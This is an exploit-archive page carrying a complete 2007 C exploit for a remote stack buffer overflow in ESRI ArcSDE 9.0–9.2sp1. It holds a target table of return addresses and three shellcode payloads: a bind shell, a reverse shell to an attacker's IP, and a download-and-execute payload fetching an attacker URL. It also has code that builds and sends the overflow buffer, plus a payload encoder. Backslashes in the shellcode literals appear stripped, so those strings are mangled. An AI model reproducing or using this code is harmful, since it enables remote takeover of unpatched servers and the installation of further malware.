[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow Exploit
# Published : 2007-07-03
# Author : Heretic2
# Previous Title : AXIS Camera Control (AxisCamControl.ocx v. 1.0.2.15) BoF Exploit
# Next Title : AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : ESRI ArcSDE 9.0 - 9.2sp1
* Site : http://www.esri.com
* Found by : iDefense, http://labs.idefense.com/intelligence/vulnerabilities/
* ----------------------------------------
* Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow exploit
* Exploit date : 26.06.2007
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : Trivially exploitable stack overflow vulnerability: if we send more than 516 bytes to
* server, we can overwrite EIP. After the EIP gets overwritten we can see that the ESP
* points to the next bytes of buffer after EIP, so we simply write shellcode at 520 byte.
* The server allows any type of buffer even with the 0x00 bytes, so have fun!
* For use universal RET's you need to find the ArcSDE version (this is not a trivial job :P)
*
* Seems that the earlier versions are also vulnerable. To protect the server against that
* vulnerability you need to install ArcSDE 9.2sp2.
* ----------------------------------------
* Compiling :
* To compile this exploit you need:
* 1. Windows C/C++ compiler
* 2. WinSock 2
* ----------------------------------------
* Thanks to :
* 1. iDefense ( http://labs.idefense.com/intelligence/vulnerabilities/ )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 4. anghell at Dreatica-FXP ( )
* 5. Dreatica-FXP crew ( http://www.dreatica.cl )
* ----------------------------------------
* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
************************************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <ctime>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url);
int get_version(char * remotehost, int port);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
SOCKET do_connect_async (char *remotehost, int port);
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
static long timeout = 2000 ; // 2 sec
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"UNIV: AcrSDE 9.0 [sdesqlsrvr90.dll] ( MSSQL )", 0x1015c357 },// jmp esp
{"UNIV: AcrSDE 9.1 [sdesqlsrvr91.dll] ( MSSQL )", 0x1015e3e7 },// jmp esp
{"UNIV: AcrSDE 9.2 [sdesqlsrvr92.dll] ( MSSQL )", 0x1008d742 },// jmp esp
{"Windows XP SP0 RUSSIAN [shell32.dll]", 0x77a96758 },// jmp esp
{"Windows XP SP1 RUSSIAN [advapi32.dll]", 0x77e1d9d3 },// jmp esp
{"Windows XP SP2 RUSSIAN [shell32.dll]", 0x7d16817f },// jmp esp
{"Windows XP SP2 ENGLISH [ole32.dll]", 0x77548952 },// jmp esp
{"Windows XP SP2 DUTCH [ntdll.dll]", 0x7c941eed },// jmp esp
{"Windows 2003 SP0 ENGLISH [shell32.dll]", 0x77add723 },// jmp esp
{"Debug / DoS", 0x42424242 },
{NULL, 0x00000000 }
};
struct {
const char * name;
int length;
char * shellcode;
}shellcodes[]={
{"Bindshell, port 4444 [ args: none ]", 696,
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx49x49x37x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
"x58x50x30x42x31x41x42x6bx42x41x52x42x32x42x41x32"
"x41x41x30x41x41x58x50x38x42x42x75x6ax49x4bx4cx62"
"x4ax68x6bx30x4dx59x78x49x69x4bx4fx79x6fx69x6fx71"
"x70x4ex6bx32x4cx51x34x64x64x6ex6bx41x55x77x4cx4c"
"x4bx71x6cx35x55x64x38x54x41x58x6fx4cx4bx30x4fx47"
"x68x4ex6bx53x6fx47x50x74x41x58x6bx70x49x4cx4bx35"
"x64x6cx4bx36x61x68x6ex57x41x79x50x6fx69x4cx6cx6c"
"x44x4bx70x63x44x43x37x5ax61x78x4ax44x4dx36x61x6a"
"x62x38x6bx78x74x77x4bx51x44x74x64x76x48x51x65x4a"
"x45x4ex6bx73x6fx61x34x55x51x5ax4bx71x76x6cx4bx64"
"x4cx72x6bx4ex6bx63x6fx57x6cx75x51x7ax4bx33x33x34"
"x6cx6cx4bx6ex69x72x4cx45x74x45x4cx30x61x4fx33x50"
"x31x69x4bx61x74x6cx4bx57x33x66x50x4ex6bx43x70x64"
"x4cx6ex6bx32x50x65x4cx6ex4dx6ex6bx77x30x67x78x31"
"x4ex33x58x6cx4ex30x4ex34x4ex5ax4cx50x50x4bx4fx69"
"x46x72x46x62x73x70x66x35x38x57x43x35x62x45x38x30"
"x77x63x43x44x72x71x4fx71x44x79x6fx4ax70x73x58x78"
"x4bx48x6dx4bx4cx77x4bx56x30x79x6fx7ax76x51x4fx6f"
"x79x79x75x32x46x4bx31x48x6dx43x38x45x52x70x55x73"
"x5ax33x32x6bx4fx4ax70x72x48x69x49x36x69x4cx35x6e"
"x4dx50x57x4bx4fx6ax76x36x33x36x33x61x43x33x63x62"
"x73x43x73x36x33x50x43x63x63x4bx4fx68x50x43x56x71"
"x78x62x31x51x4cx30x66x30x53x6bx39x78x61x4cx55x65"
"x38x4ex44x67x6ax74x30x6fx37x70x57x69x6fx6ex36x32"
"x4ax36x70x43x61x32x75x79x6fx4ex30x50x68x4fx54x6e"
"x4dx64x6ex6dx39x52x77x79x6fx58x56x66x33x36x35x69"
"x6fx4ex30x45x38x38x65x72x69x6bx36x77x39x33x67x79"
"x6fx6ex36x70x50x31x44x62x74x73x65x6bx4fx58x50x6d"
"x43x50x68x4bx57x44x39x4fx36x64x39x71x47x6bx4fx49"
"x46x63x65x6bx4fx4ax70x71x76x50x6ax50x64x50x66x70"
"x68x50x63x52x4dx6ex69x58x65x32x4ax46x30x63x69x45"
"x79x48x4cx4cx49x7ax47x63x5ax70x44x4dx59x78x62x36"
"x51x39x50x38x73x4fx5ax6bx4ex41x52x64x6dx6bx4ex32"
"x62x36x4cx4ex73x4cx4dx43x4ax34x78x4cx6bx6ex4bx6e"
"x4bx51x78x70x72x6bx4ex4ex53x47x66x4bx4fx32x55x50"
"x44x4bx4fx7ax76x43x6bx70x57x62x72x46x31x66x31x32"
"x71x30x6ax35x51x33x61x32x71x33x65x53x61x4bx4fx5a"
"x70x30x68x6ex4dx6ex39x73x35x7ax6ex62x73x4bx4fx48"
"x56x63x5ax6bx4fx59x6fx57x47x39x6fx6ex30x4ex6bx30"
"x57x59x6cx4bx33x38x44x45x34x59x6fx39x46x50x52x39"
"x6fx58x50x65x38x38x70x6ex6ax37x74x53x6fx31x43x6b"
"x4fx6ax76x6bx4fx78x50x42"
},
{"ReverseShell [ args: -I <ip> -P <port> ]", 316,
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0BxC2xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x2Bx39xC2xC2xC2x9DxA6x63xF2xC2xC2xC2x49x82xCEx49"
"xB2xDEx6Fx49xAAxCAx49x35xA8xC6x9Bx2Ax59xC2xC2xC2"
"x20x3BxAAxF1xF0xC2xC2xAAxB5xB1xF0x9Dx96x3DxD4x49"
"x2AxA8xC6x9Bx2Ax40xC2xC2xC2x20x3Bx43x2Ex52xC3xC2"
"xC2x96xAAxC3xC3xC2xC2x3Dx94xD2x92x92x92x92x82x92"
"x82x92x3Dx94xD6x49x1AxAAxBDxC2xC2xC3xAAxC0xC2xC2"
"xF7x49x0ExA8xD2x93x91x3Dx94xDAx47x02xB7x88xAAxA1"
"xAFxA6xC2x4BxA4xF2x41x2Ex96x4FxFExE6xA8xD7x9Bx69"
"x20x3Fx04x86xE6xD2x86x3Cx86xE6xFFx4Bx9ExE6x8Ax4B"
"x9ExE6x8Ex4Bx9ExE6x92x4Fx86xE6xD2x96x92x93x93x93"
"xA8xC3x93x93x3DxB4xF2x93x3Dx94xC6x49x0ExA8x3Dx3D"
"xF3x3Dx94xCAx91x3Dx94xDEx3Dx94xCEx93x94x49x87xFE"
"x49x96xEAxBAxC1x17x90x49xB0xE2xC1x37xF1x0Bx8Bx83"
"x6FxC1x07xF1x19xCDx7CxD2xF8x14xB6xCAx03x09xCFxC1"
"x18x82x29x33xF9xDDxB7x25x98x49x98xE6xC1x1FxA4x49"
"xCEx89x49x98xDExC1x1Fx49xC6x49xC1x07x69x9Cx9Bx01"
"x2AxC2x3Dx3Dx3Dx4Cx8CxCCx2ExB0x3Cx71xD4x6Fx1BxC7"
"x0CxBCx1Ax20xB1x09x2Fx3ExF9x1BxCBx37x6Fx2Ex3Bx68"
"xA2x25xBBx04xBB"
},
{"Download and execute [ args: -u <URL> ]", 729,
/* win32_download_exec - http://metasploit.com */
/* encoded by "ALPHA 2: Zero-tolerance. <skylined@edup.tudelft.nl> */
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x37x51x5Ax6Ax41x58x50x30x41x30x41x6Bx41x41x51"
"x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4Ax49x58x6Bx36x70x71x4Ax33x7Ax76x53x59x59x71"
"x76x38x39x57x4Cx35x51x6Bx30x74x74x74x4Ax6Ex79x39"
"x72x7Ax5Ax78x6Bx36x65x4Dx38x7Ax4Bx4Bx4Fx4Bx4Fx4B"
"x4Fx54x30x50x4Cx4Ex79x6Cx59x5Ax39x4Fx33x79x6Dx55"
"x68x6Cx69x5Ax39x4Ex79x4Ax39x34x52x58x59x6Ex75x54"
"x52x4Bx59x6Dx55x36x54x45x42x7Ax79x6Fx61x56x72x53"
"x71x34x52x5Ax4Ax6Dx75x76x72x4Ax4Dx4Ex67x4Dx31x6F"
"x6Ax72x4Ax36x72x6Bx57x4Ex59x4Fx6Ax33x52x76x72x6E"
"x37x4Cx4Dx6Fx5Ax74x34x7Ax6Fx48x4Ex79x58x55x42x4D"
"x76x4Cx5Ax73x52x74x52x32x4Bx6Bx43x4Cx57x49x50x52"
"x4Ax75x6Fx7Ax4Dx4Ax31x69x50x59x56x54x5Ax51x4Ex4F"
"x6Dx69x4Cx33x4Bx64x30x4Bx70x6Fx36x6Bx77x54x52x73"
"x64x62x32x79x4Fx4Dx6Dx6Ex7Ax70x5Ax73x78x70x78x4F"
"x6Ax62x78x6Dx7Ax50x50x4Bx4Fx75x42x4Ax31x75x42x4B"
"x6Fx6Fx75x4Dx4Ax61x4Ax52x78x52x58x4Dx4Bx6Ex7Ax50"
"x58x66x72x4Dx49x6Dx4Ax51x4Ax56x72x55x33x62x32x50"
"x6Ex55x4Ax51x4Fx4Ex77x75x42x63x79x49x63x4Dx4Dx39"
"x50x32x51x4Bx79x4Dx49x6Dx49x6Ex79x76x7Ax51x4Fx4C"
"x54x68x4Bx78x4Fx71x76x6Ax6Ex55x35x59x53x77x62x53"
"x71x4Bx43x4Ex78x39x50x31x61x59x34x4Dx49x4Cx59x6E"
"x79x46x7Ax71x4Fx6Fx7Ax6Ax6Fx69x4Fx74x59x4Dx77x77"
"x69x78x6Cx73x53x37x69x6Ex4Fx37x69x7Ax67x75x4Ax73"
"x45x6Ex59x75x42x71x55x6Bx43x78x39x4Bx7Ax45x36x68"
"x4Ex73x45x31x4Ex6Dx4Dx4Fx6Ax39x55x79x68x6Ex57x4B"
"x4Cx51x4Ex6Bx6Dx4Fx6Ax4Dx4Dx38x61x79x6Cx6Cx59x6A"
"x39x4Fx5Ax70x59x4Bx79x79x59x6Ax6Ax4Ax6Fx39x59x73"
"x56x48x4Ex53x55x55x42x71x55x6Bx79x6Ax6Ax50x66x48"
"x4Ex65x39x6Ax69x65x36x78x4Ex50x6Dx6Fx5Ax52x79x30"
"x35x35x4Cx50x59x4Ax4Cx31x70x58x48x78x4Bx78x4Fx6A"
"x6Ax52x46x50x4Bx68x43x6Bx70x74x72x73x4Bx70x77x4F"
"x5Ax56x39x73x6Ax61x61x4Dx6Fx63x56x43x56x75x36x4B"
"x6Ex79x6Cx7Ax4Dx6Fx39x78x6Bx58x76x6Bx4Ax78x58x4B"
"x4Dx6Bx4Dx5Ax4Bx4Bx4Cx4Ax4Ax7Ax4Ax5Ax39x59x4Ex6B"
"x4Cx48x6Dx5Ax6Ax6Bx50x4Bx5Ax5Ax4Dx4Bx4Cx4Bx44x6B"
"x6Dx6Cx30x4Ax4Bx6Bx4Cx79x6Ax58x6Dx59x66x5Ax4Bx59"
"x70x68x58x4Dx49x7Ax6Ex6Ax50x4Cx37x4Bx6Cx6Dx31x6B"
"x4Cx6Bx4Ax6Cx59x4Bx6Cx6Bx51x5Ax50x48x6Dx4Ax6Dx68"
"x71x4Ax4Bx79x6Cx59x68x6Bx4Dx4Fx69x6Ex35x4Bx46x6B"
"x48x4Bx4Dx4Ex35x78x70x6Bx4Bx4Ax4Bx7Ax58x48x6Bx4B"
"x50x4Ax78x4Cx59x4Ax4Cx4Ax4Bx6Ax55x59x64x4Cx36x6B"
"x47x4Ex79x68x4Cx38x4Bx7Ax75x4Bx6Dx79x66x7Ax4Ex4B"
"x47x39x65x4Ax56x58x78x4Bx4Dx7Ax6Dx4Cx36x59x4Fx78"
"x70x7Ax55x39x6Cx6Ex38x6Dx49"
},
{NULL , NULL }
};
int main(int argc, char **argv)
{
char * remotehost=NULL, * cbip=NULL, *url=NULL;
char default_remotehost[]="127.0.0.1";
char default_cbip[]="127.0.0.1";
char temp1[100], temp2[100];
int cbport, port, itarget, sh;
char ss[100];
SOCKET s;
char c;
int option_index=0;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
cbport=4444;
port=5151;
itarget=-1;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:I:P:u:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
case 'P':
sscanf(optarg, "%d", &cbport);
break;
case 'I':
cbip=optarg;
break;
case 'u':
url=optarg;
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL) remotehost=default_remotehost;
if(cbip == NULL) cbip=default_cbip;
if(url == NULL) url="";
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, 'x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Payload : %s%s# n", temp2, temp1);
if(itarget!=-1)
{
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# n", targets[itarget].t, temp1);
}else
{
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen("Please select target") -1);
printf(" # Target : %s%s# n", "Please select target", temp1);
}
if(sh==1)
{
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(cbip) -1);
printf(" # CB IP : %s%s# n", cbip, temp1);
sprintf(temp2, "%d", cbport);
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # CB port : %s%s# n", temp2, temp1);
}
printf(" # ------------------------------------------------------------------- # n");
fflush(stdout);
printf(" [+] Checking if server is onlinen");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
printf(" [-] Server is OFFLINEn");
end_logo();
return 0;
}
closesocket(s);
printf(" [+] Server is ONLINEn");
if(itarget==-1)
{
itarget = get_version(remotehost, port);
if(itarget>=0)
{
printf(" [+] Target: %s%n", targets[itarget].t);
}else
{
printf(" [-] Please select targetn");
WSACleanup();
end_logo();
return -1;
}
}
unsigned char buf[10000];
unsigned int len;
memset(buf,0,sizeof(buf));
fflush(stdout);
make_buffer(buf, &len, itarget, sh, cbip, cbport, url);
printf(" [+] Attacking buffer constructedn");
if(send_buffer(buf, len, remotehost,port)==-1)
{
printf(" [-] Cannot exploit server %sn", remotehost);
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sentn");
if(sh==0)sprintf(ss, " [+] Connect to %s:%dn", remotehost, 4444);
if(sh==1)sprintf(ss, " [+] The shell should arrive at %s:%dn", cbip, cbport);
if(sh==2)sprintf(ss, " [+] File is downloaded and executredn");
printf("%s", ss);
end_logo();
WSACleanup();
return 0;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror("[-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
return s;
}
SOCKET do_connect_async (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror("[-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
unsigned long l = 1;
if ( ioctlsocket( s, FIONBIO, &l ) != 0 )
{
fprintf( stderr, "Failed setting socket to non-blocking moden" );
closesocket( s );
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if ( connect( s, (sockaddr*) &addr, sizeof( sockaddr ) ) == SOCKET_ERROR )
{
int error = WSAGetLastError( );
if ( ( error != WSAEWOULDBLOCK ) && ( error != WSAEINPROGRESS ) )
{
fprintf( stderr, "Failed connecting to remote host, %dn", error );
closesocket( s );
return -1;
}
}
return s;
}
// get arcsde version to determine target
int get_version(char * remotehost, int port)
{
// ----------------------------------------
// removed due to publicity of the exploit
// ----------------------------------------
return -1;
}
void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh, char * cbip, int cbport, char *url)
{
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
*fshlength = shellcodes[sh].length;
if(sh==1)
{
static struct hostent *host = gethostbyname(cbip);
static struct sockaddr_in addr;
addr.sin_addr = *(struct in_addr*)host->h_addr;
fsh[111] = (addr.sin_addr.S_un.S_un_b.s_b1) ^ 0xc2;
fsh[112] = (addr.sin_addr.S_un.S_un_b.s_b2) ^ 0xc2;
fsh[113] = (addr.sin_addr.S_un.S_un_b.s_b3) ^ 0xc2;
fsh[114] = (addr.sin_addr.S_un.S_un_b.s_b4) ^ 0xc2;
fsh[118] = ((cbport >> 8) & 0xff) ^ 0xc2;
fsh[119] = ((cbport ) & 0xff) ^ 0xc2;
}
if(sh==2)
{
char locurl[1000];
memset(locurl,0,sizeof(locurl));
memcpy(locurl, url, strlen(url));
locurl[strlen(locurl)]='x80';
char encoded_url[2500] ;
alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
strcat((char *)fsh, encoded_url);
*fshlength += (unsigned int)strlen(encoded_url);
}
}
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url)
{
// prepare shellcode
unsigned char fsh[10000];
unsigned int fshlength;
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, &fshlength, sh, cbip, cbport, url);
// -----------------
// make buffer
unsigned char * cp=buf;
// long buffer
*cp++='x80';
memset(cp, 'x41', 515);
cp+=515;
//replace EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// jff
*cp++ = 'x90';
*cp++ = 'x90';
*cp++ = 'x90';
*cp++ = 'x90';
// copy shellcode
memcpy(cp, fsh, fshlength);
cp+=fshlength;
// set the length manually cause of the 0x00 bytes
*len = (unsigned int)(cp-buf);
// -----------------
}
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
{
SOCKET sock;
char str[1000];
int bytes;
char bufmax[4096];
sock = do_connect_async(remotehost, port);
if(sock==-1)
{
printf(" [-] Failed to connect to servern");
}
fd_set fdConnect = { 0 };
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
long dwTimeout=5000;
if (INFINITE != dwTimeout)
{
stTime.tv_sec = dwTimeout / 1000;
stTime.tv_usec = dwTimeout % 1000;
pstTime = &stTime;
}
if (!FD_ISSET(sock, &fdConnect))
FD_SET(sock, &fdConnect);
int res = select(NULL, NULL, &fdConnect, NULL, pstTime);
if(res==0)
{
closesocket(sock);
return -1;
}
if(res<0)
{
closesocket(sock);
return -1;
}
bytes = send(sock, (char *)buf, len, 0);
Sleep(500);
printf(" [+] Sent %d bytes to servern", bytes);
fd_set active_set, read_set;
FD_ZERO(&active_set);
FD_SET(sock, &active_set);
read_set = active_set;
res = select(FD_SETSIZE,&read_set,NULL,NULL, pstTime);
if (res==0)
{
closesocket(sock);
return 1;
}
if ( res<0 ) {
closesocket(sock);
return -1;
}
for (int i=0; i<FD_SETSIZE; i++)
{
if ( FD_ISSET(i,&read_set) )
{
if ( i==sock )
{
if((bytes = recv(sock, bufmax, sizeof(bufmax),0)) == -1){
int error = WSAGetLastError( );
if ( ( error != WSAEWOULDBLOCK ) && ( error != WSAEINPROGRESS ) )
{
closesocket( sock );
return -1;
}
return 1;
}
} else {
closesocket(sock);
return -1;
}
}
}
closesocket(sock);
return 1;
}
// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded )
{
int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
char temp[10];
memset(temp, 0 , sizeof(temp));
memset(encoded,0x00,1000);
srand((int)clock());
while( (input = to_encode[ii++]) != 0 ) {
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
E = valid_chars[i] >> 4;
D = (A^E);
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
C = valid_chars[i] >> 4;
sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
encoded[strlen(encoded)]=temp[0];
encoded[strlen(encoded)]=temp[1];
}
encoded[strlen(encoded)]='A';
return 0;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '�')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '�')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf(" Usage : %s -h <host> -p <port> -s <payload> -t <target> -I <IP> -P <port> -u <url>n", s);
printf(" Arguments:n");
printf(" -h <host> host to connectn");
printf(" -p <port> port (default: 5151)n");
printf(" -s <payload> select shellcode (default: 1)n");
printf(" -t <target> target to attackn");
printf(" -I <IP> reverse IP for the connect-back shellcoden");
printf(" -P <port> reverse port for the connect-back shellcoden");
printf(" -u <url> url for executable for DAX shellcodenn");
printf(" Shellcodes:n");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %sn",i+1,shellcodes[i].name);
}
printf("n");
printf(" Targets:n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %sn",j+1,targets[j].t);
}
printf("n");
end_logo();
}
void logo()
{
printf("nn");
printf(" ####################################################################### n");
printf(" # ____ __ _ ______ __ _____ #n");
printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / #n");
printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / #n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ #n");
printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ #n");
printf(" # crew #n");
printf(" ####################################################################### n");
printf(" # Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow # n");
printf(" # Solution: ESRI ArcSDE 9.2 sp2 is invulnerable # n");
printf(" # Author : Heretic2 (heretic2x@gmail.com # n");
printf(" # THANKS : iDefense, Zero-tolerance, Metasploit project and anghell # n");
printf(" # Research: iDefense # n");
printf(" # Version : 1.0 Public Release # n");
printf(" # System : Windows ALL # n");
printf(" # Date : 26.06.2007 # n");
printf(" # ------------------------------------------------------------------- # n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # n");
printf(" # Dreatica-FXP crew [Heretic2] # n");
printf(" ####################################################################### nn");
}
// www.Syue.com [2007-07-03]